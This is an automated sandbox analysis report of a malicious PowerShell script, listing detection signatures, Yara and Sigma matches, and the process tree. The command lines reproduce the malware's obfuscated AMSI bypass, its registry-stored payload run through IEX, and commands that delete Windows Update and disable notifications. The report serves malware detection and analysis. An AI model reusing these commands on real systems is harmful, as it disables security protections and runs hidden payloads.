Windows
Analysis Report
SUS.ps1
Overview
General Information
Detection
| Score | Range | Confidence |
|---|---|---|
| 100 | 0 - 100 | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Yara detected UAC Bypass using CMSTP
Changes security center settings (notifications, updates, antivirus, firewall)
Disable Windows Notification Center
Disable Windows Toast Notifications
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Powershell drops PE file
Sample is not signed and drops a device driver
Stops critical windows services
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64_ra
- powershell.exe (PID: 3552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\SUS.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6164 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" $lambczojaanjr=[System.Text.Encoding]::ASCII.GetString($(gp HKCU:\Software\cudyoiiqiyyyd).iaetrrvsxsjkc); ri -Force HKCU:\Software\cudyoiiqiyyyd; IEX($lambczojaanjr) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 7160 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cmd.exe (PID: 6712 cmdline: "C:\Windows\Sysnative\cmd.exe" /C "echo $($tiebicislihiakywle=$([Ref].Assembly.GetType('viqeempiapqylyunela'));$hatuwucehuubumag=[Ref].Assembly.GetType($((249,363,345,348,303,327,138,231,291,330,291,309,303,327,303,330,348,138,195,351,348,333,327,291,348,315,333,330,138,195,327,345,315,255,348,315,324,345)^^^|%{[char]($_/3)})-join'');$yggugyygypylrycood=$(142 -ge 126);if($hatuwucehuubumag){$hatuwucehuubumag.GetField($((28,40,46,36,4,41,36,47,1,28,36,39,32,31)^^^|%{[char]($_+69)})-join'',$((156,222,220,160,234,196,216,210,198,88,166,232,194,232,210,198)^^^|%{[char]($_/2)})-join'').SetValue($tiebicislihiakywle,$yggugyygypylrycood)}; $oktoundiveemzaynfo = $('{7}{1}{4}{6}{9}{3}' -f 'n','','g','x','','i','','i','b','e','v'); $((364,332,484,460,464,404,436,184,276,440,472,420,456,444,440,436,404,440,464,372,232,232,332,404,464,276,440,472,420,456,444,440,436,404,440,464,344,388,456,420,388,392,432,404,160,156,388,432,440,388,460,468,484,456,416,484,476,444,484,452,476,404,432,444,444,480,412,484,488,484,472,156,176,128,228,208,212,212,164,236,128,144,160,364,456,404,412,404,480,372,232,232,308,388,464,396,416,160,160,364,460,464,456,420,440,412,372,144,160,396,436,400,128,188,268,128,456,404,412,128,452,468,404,456,484,128,288,300,268,340,368,332,444,408,464,476,388,456,404,368,340,396,420,488,388,416,128,188,472,128,404,408,480,468,396,420,404,452,444,164,164,176,128,156,328,276,284,380,332,360,364,128,372,172,160,184,168,164,156,164,184,284,456,444,468,448,460,364,196,372,184,344,388,432,468,404,128,496,128,292,276,352,164)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($oktoundiveemzaynfo) | %WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3684 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($tiebicislihiakywle=$([Ref].Assembly.GetType('viqeempiapqylyunela'));$hatuwucehuubumag=[Ref].Assembly.GetType($((249,363,345,348,303,327,138,231,291,330,291,309,303,327,303,330,348,138,195,351,348,333,327,291,348,315,333,330,138,195,327,345,315,255,348,315,324,345)^|%{[char]($_/3)})-join'');$yggugyygypylrycood=$(142 -ge 126);if($hatuwucehuubumag){$hatuwucehuubumag.GetField($((28,40,46,36,4,41,36,47,1,28,36,39,32,31)^|%{[char]($_+69)})-join'',$((156,222,220,160,234,196,216,210,198,88,166,232,194,232,210,198)^|%{[char]($_/2)})-join'').SetValue($tiebicislihiakywle,$yggugyygypylrycood)}; $oktoundiveemzaynfo = $('{7}{1}{4}{6}{9}{3}' -f 'n','','g','x','','i','','i','b','e','v'); $((364,332,484,460,464,404,436,184,276,440,472,420,456,444,440,436,404,440,464,372,232,232,332,404,464,276,440,472,420,456,444,440,436,404,440,464,344,388,456,420,388,392,432,404,160,156,388,432,440,388,460,468,484,456,416,484,476,444,484,452,476,404,432,444,444,480,412,484,488,484,472,156,176,128,228,208,212,212,164,236,128,144,160,364,456,404,412,404,480,372,232,232,308,388,464,396,416,160,160,364,460,464,456,420,440,412,372,144,160,396,436,400,128,188,268,128,456,404,412,128,452,468,404,456,484,128,288,300,268,340,368,332,444,408,464,476,388,456,404,368,340,396,420,488,388,416,128,188,472,128,404,408,480,468,396,420,404,452,444,164,164,176,128,156,328,276,284,380,332,360,364,128,372,172,160,184,168,164,156,164,184,284,456,444,468,448,460,364,196,372,184,344,388,432,468,404,128,496,128,292,276,352,164)^|%{[char]($_/4)})-join'') ^| ^&($oktoundiveemzaynfo) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 3008 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cmd.exe (PID: 2740 cmdline: "C:\Windows\system32\cmd.exe" /C reg query HKCU\Software\Ucizah /v efxucieqo MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 7108 cmdline: reg query HKCU\Software\Ucizah /v efxucieqo MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cmd.exe (PID: 5764 cmdline: /C sc stop wuauserv MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- sc.exe (PID: 4540 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- cmd.exe (PID: 408 cmdline: /C sc config wuauserv start= disabled MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- sc.exe (PID: 6692 cmdline: sc config wuauserv start= disabled MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- cmd.exe (PID: 6724 cmdline: /C sc delete wuauserv MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- sc.exe (PID: 1608 cmdline: sc delete wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
- cmd.exe (PID: 2356 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 3424 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cmd.exe (PID: 1448 cmdline: /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 1284 cmdline: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cmd.exe (PID: 6176 cmdline: /C reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 2740 cmdline: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- cmd.exe (PID: 1228 cmdline: /C powercfg -hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powercfg.exe (PID: 6900 cmdline: powercfg -hibernate off MD5: 9D71DBDD3AD017EC69554ACF9CAADD05)
- svchost.exe (PID: 3740 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- SgrmBroker.exe (PID: 7084 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
- svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 5444 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- MpCmdRun.exe (PID: 5724 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
- conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- svchost.exe (PID: 5508 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | |
| | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
| | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | |
System Summary

| Source | Author |
|---|---|
| | frack113 |
| | frack113, Nasreddine Bencherchali (Nextron Systems) |
| | frack113, Nasreddine Bencherchali (Nextron Systems) |